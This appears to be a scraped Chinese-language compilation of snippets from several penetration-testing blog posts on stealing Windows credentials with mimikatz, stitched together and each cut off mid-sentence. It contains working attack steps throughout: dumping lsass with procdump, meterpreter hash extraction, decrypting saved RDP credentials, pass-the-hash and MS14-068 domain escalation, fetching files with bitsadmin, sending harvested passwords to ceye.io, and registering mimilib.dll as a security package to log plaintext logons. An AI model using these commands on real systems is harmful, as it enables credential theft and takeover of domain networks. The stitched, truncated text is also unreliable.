mimikatz

利用Powershell和ceye.io实现Windows账户密码回传 转自：http://www.freebuf.com/articles/system/129068.html 最近在研究Powershell的使用，之前我一直不习惯Windows的主要原因是他那孱弱的命令行工具，稍微了解了Powershell之后差点跪下了，真的是一款非常了不起的工具。powershell的定义是一种命令行外壳程序和脚本环境，使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。简单的理解就是像linux下的bash。powershell有着诸多的优点，但是仅凭无文件和操作系统自带这两大优点基本上确定了他的地位。mimikatz是一款黑客后渗透(不是提权)神器，其中一个功能是在管理员账户下获取Windows明文密码，现在也有powershell版本了。我想测试的流程就是通过powershell获取Windows信息之后提取关键的用户名和密码，将用户名和密码转码之后访问ceye.io，这样就可以拿到Windows账户信息了. 0×01 mimikatz获取Windows内容保存到变量 mimikatz现在已经有powershell版本了，而且是http传输，进行免杀要比exe容易，这里不探讨免杀的内容。 IEX ( New-Object Net.WebClient)

kali这方面不说了, meterpreter也略过, 做个关于mimikatz的笔记. mimikatz模块, 能获取对方机器的密码(包括哈希和明文). 渗透模块怎么进的也不说了, 方式太多, 我用的是ms17-010 进去meterpreter后getuid一下(其他这个也没多大用处,军哥说进入meterpreter模式下 大部分情况下是拥有 system权限,无需 get system,但可能有些 权限管理严的 不一样) meterpreter > getuid Server username: NT AUTHORITY\SYSTEM 这获得系统管理员权限 加载mimikatz模块 meterpreter > load mimikatz Loading extension mimikatz...Success. 加载成功. 获取登录密码的hash值 meterpreter > msv [+] Running as SYSTEM [*] Retrieving msv credentials msv credentials =============== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;334101 NTLM chenglee-PC chenglee lm{

Psexec原理 - oneVs1的专栏 - 博客频道 - CSDN.NET 在远程终端（3389、mstsc.exe）、虚拟桌面中抓取密码的方法： 通常你在远程终端中运行该程序会提示：存储空间不足，无法处理此命令。 这是因为在终端模式下，不能插入远线程，跨会话不能注入，你需要使用如下方法执行该程序： 首先提取几个文件，只抓取密码的话，只需要这几个文件： ? 1 2 3 mimikatz_trunk\tools\PsExec.exe mimikatz_trunk\Win32\mimikatz.exe mimikatz_trunk\Win32\sekurlsa.dll 打包后上传至目标服务器，然后解压释放，注意路径中绝对不能有中文（可以有空格）！否则加载DLL的时候会报错：找不到文件。 然后使用以下任何一种方法即可抓取密码： //最简单实用的方法，使用 PsExec.exe 启动。 //在系统帐户中运行 cmd.exe，或者直接运行 mimikatz.exe psexec -s cmd.exe //启动 mimikatz.exe 来源： https://www.cnblogs.com/SZLLQ2000/p/5069146.html

前言 很早就想专门写一篇关于内网的文章，一直没有腾出空来，万万没想到，写下这篇文章的时候，竟然是我来某实验室实习的时间段:) 信息搜集 nmap扫描实时存活的ip nmap 10.1.1.1 --open -oG scan-results; cat scan-results | grep "/open" | cut -d " " -f 2 > exposed-services-ips 常用命令 ipsping icmp连通性 nslookup www.baidu.com vps-ip dns连通性 dig @vps-ip www.baidu.com curl vps:8080 http连通性 tracert bitsadmin /transfer n http://ip/xx.exe C:\windows\temp\x.exe一种上传文件 >=2008 fuser -nv tcp 80 查看端口pid rdesktop -u username ip linux连接win远程桌面 (有可能不成功) where file win查找文件是否存在 找路径，Linux下使用命令find -name *.jsp来查找，Windows下，使用for /r c:\windows\temp\ %i in (file lsss.dmp) do @echo %i netstat -apn | grep

复现过程 导出lsass.exe 首先要获取到内存文件lsass.exe进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到,这里用到微软官方发布的工具Procdump导出lsass.exe，所以不存在被杀软拦截的情况： 上传文件procdump64.exe到可执行目录中，执行下面语句： procdump64 . exe - accepteula - ma lsass . exe lsass . dmp 这是路径:C:\phpStudy\PHPTutorial\WWW\lsass.dmp。 这个时候我们可以将该文件down到本地来通过 mimikatz 读取密码，这里一定要注意下载的 lsass.dmp文件一定要和mimikatz在同一个目录下 打开本地的 mimikatz 执行： "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" 就可以直接列出账号明文密码，还有NTLM的hash，hash可以拿去网站解密下，一般情况下六位以下密码还是很容易破解出来的。 来源： CSDN 作者： cj_hydra 链接： https://blog.csdn.net/cj_Allen/article/details/104107095

简单记录下获取远程主机RDP凭据。 Windows保存RDP凭据的目录是： C:\Users\用户名\AppData\Local\Microsoft\Credentials 可通过命令行获取，执行: cmdkey /list或powerpick Get-ChildItem C:\Users\rasta_mouse\AppData\Local\Microsoft\Credentials\ -Force 注意:cmdkey /list命令务必在Session会话下执行，system下执行无结果。 使用cobalt strike中的mimikatz可以获取一部分接下来要用到的masterkey和pbData mimikatz dpapi::cred /in:C:\Users\USERNAME\AppData\Local\Microsoft\Credentials\SESSIONID 输出应类似 **BLOB** dwVersion : 00000001 - 1 guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} dwMasterKeyVersion : 00000001 - 1 guidMasterKey : {0785cf41-0f53-4be7-bc8b-6cb33b4bb102} dwFlags : 20000000 -

---------------------------------------------- 本文参考自三好学生-域渗透系列文章 内网渗透之PTH&PTT&PTK PTH(pass-the-hash) pass-the-hash在内网渗透中是一种很经典的攻击方式，原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务，而不用提供明文密码。 pass the hash原理： 在Windows系统中，通常会使用NTLM身份认证 NTLM认证不使用明文口令，而是使用口令加密后的hash值，hash值由系统API生成(例如LsaLogonUser) hash分为LM hash和NT hash，如果密码长度大于15，那么无法生成LM hash。从Windows Vista和Windows Server 2008开始，微软默认禁用LM hash 如果攻击者获得了hash，就能够在身份验证的时候模拟该用户(即跳过调用API生成hash的过程) 这类攻击适用于： 域/工作组环境 可以获得hash，但是条件不允许对hash爆破 内网中存在和当前机器相同的密码 微软也对pth打过补丁，然而在测试中发现，在打了补丁后，常规的Pass The Hash已经无法成功，唯独默认的Administrator(SID 500)账号例外，利用这个账号仍可以进行Pass The

0x00 前言 在做***测试时，当遇到域环境，获取到一个域成员账号后，如果域控制器未打好补丁，则可以利用本文所提到的漏洞，快速获取到域控制器权限。笔者这里总结网上已有资料，加以描述，希望你能在实际测试中派上用场。 0x01 准备工作 域成员账号及密码一个 mimikatz ms14-068.exe 03以上服务器或pc 0x02 模拟环境 域控制器 2008r2 dc.test.com 192.168.3.100 域内机器 2008r2 client.test.com 192.168.3.10 0x03 漏洞自检 MS14-068编号CVE-2014-6324，补丁为3011780，如果自检可在域控制器上使用命令检测 systeminfo |find "3011780" 为空则代表没有打该补丁，存在漏洞！ 如果属于黑盒测试，并没有直接操作域控制器的权限，那么只能使用该漏洞，看是否能成功伪造域管理员登录来验证 0x04 漏洞利用 1. 获取域成员sid 获取域成员sid的方式有多种，当然前提是建立在0x01上，本次使用最为简单的命令获取 whoami /all #该命令获取当前登录用户的信息，这里使用的是域成员登录，所以获取到的是域成员normal的sid 2. 生成TGT票据 使用ms14-068.exe，网上有多种版本，有python脚本（需要在***机上安装python2

下载地址 https://github.com/gentilkiwi/mimikatz/ windows:https://download.csdn.net/download/think_ycx/9362975 官方使用教程 http://www.91ri.org/15178.html windows密码文件的解读 加密方式链接： https://blog.csdn.net/ytfhjhv/article/details/83513671 存储位置:C:\windows\system32\config\SAM 密码文件存储格式： Windows系统下的hash密码格式为：用户名称:RID:LM-HASH值:NT-HASH值 SID和RID的解读: 链接:https://www.secpulse.com/archives/72017.html SID:安全标示符,是Windows系统用于唯一标识用户或组的可变长度结构 RID:Windows系统账户对应固定的RID 500： ADMINISTRATOR 501： GUEST 502: krbtgt(域环境) 512: Domain Admins(域环境) 513: Domain Users(域环境) 514: Domain Guests(域环境) 515: Domain Computers(域环境) 516: Domain

一、ssp密码记录 ssp（security Support Provider）,一个用于身份验证的 dll,系统在启动时 SSP 会被加载到 lsass.exe 进程中,由于 lsa 可扩展,导致在系统启动时我们可以加载一个自定义的 dll,一个用于记录所有登录到当 前系统的明文账号密码的 dll, 利用mimikatz 中mimilib.dll 文件。 把 mimikatz 中的 mimilib.dll 传到目标域控的 c:\windows\system32\目录下 copy mimilib.dll %systemroot%\system32 reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages" reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ 重启成功，如果有用户成功登录到当前系统中,会在 c:\windows\system32 目录下生成一个用于记录登账账号密码的 kiwissp.log 文件 （2）利用方式二